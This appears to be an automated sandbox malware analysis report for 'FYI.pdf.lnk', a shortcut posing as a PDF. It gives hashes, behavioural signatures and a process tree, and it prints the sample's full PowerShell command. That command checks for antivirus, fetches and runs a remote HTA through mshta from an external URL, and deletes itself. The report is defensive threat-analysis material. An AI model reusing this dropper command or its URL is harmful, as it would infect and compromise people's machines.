Analysis
-
max time kernel
121s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29/02/2024, 05:23
Static task
static1
Behavioral task
behavioral1
Sample
FYI.pdf.lnk
Resource
win7-20240221-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
FYI.pdf.lnk
Resource
win10v2004-20240226-en
7 signatures
150 seconds
General
-
Target
FYI.pdf.lnk
-
Size
2KB
-
MD5
7aedf8f8a11a97880b16544588f15683
-
SHA1
a31781401cc7dac39e62d4812c17cf96f889d350
-
SHA256
d8dbb40faf7b8585dc9963d2addf23d922c517623a24770e42f91dbe58975194
-
SHA512
db9be41e532757c4e5cb0cc1a8630000718aeb50bce2c4fa937861f445d4e9f35478e64b78fd273c09ae6fe45e8e4c6a3c5f3600e1948cca23137b90f5ecf14c
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://thanhancompany.com/grip/FYI
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2440 mshta.exe 6 2440 mshta.exe 7 2440 mshta.exe 8 2440 mshta.exe -
Deletes itself 1 IoCs
pid Process 2736 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2736 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1492 wrote to memory of 2736 1492 cmd.exe 29 PID 1492 wrote to memory of 2736 1492 cmd.exe 29 PID 1492 wrote to memory of 2736 1492 cmd.exe 29 PID 2736 wrote to memory of 2440 2736 powershell.exe 30 PID 2736 wrote to memory of 2440 2736 powershell.exe 30 PID 2736 wrote to memory of 2440 2736 powershell.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\FYI.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $j = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($u in $j ){if ($u.displayName -replace 'Windows Defender', ''){Exit}}.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://thanhancompany.com/grip/FYI;$EPWZ = Get-Location;$EPWZ = Join-Path $EPWZ 'FYI.pdf.lnk';del $EPWZ2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://thanhancompany.com/grip/FYI3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:2440
-
-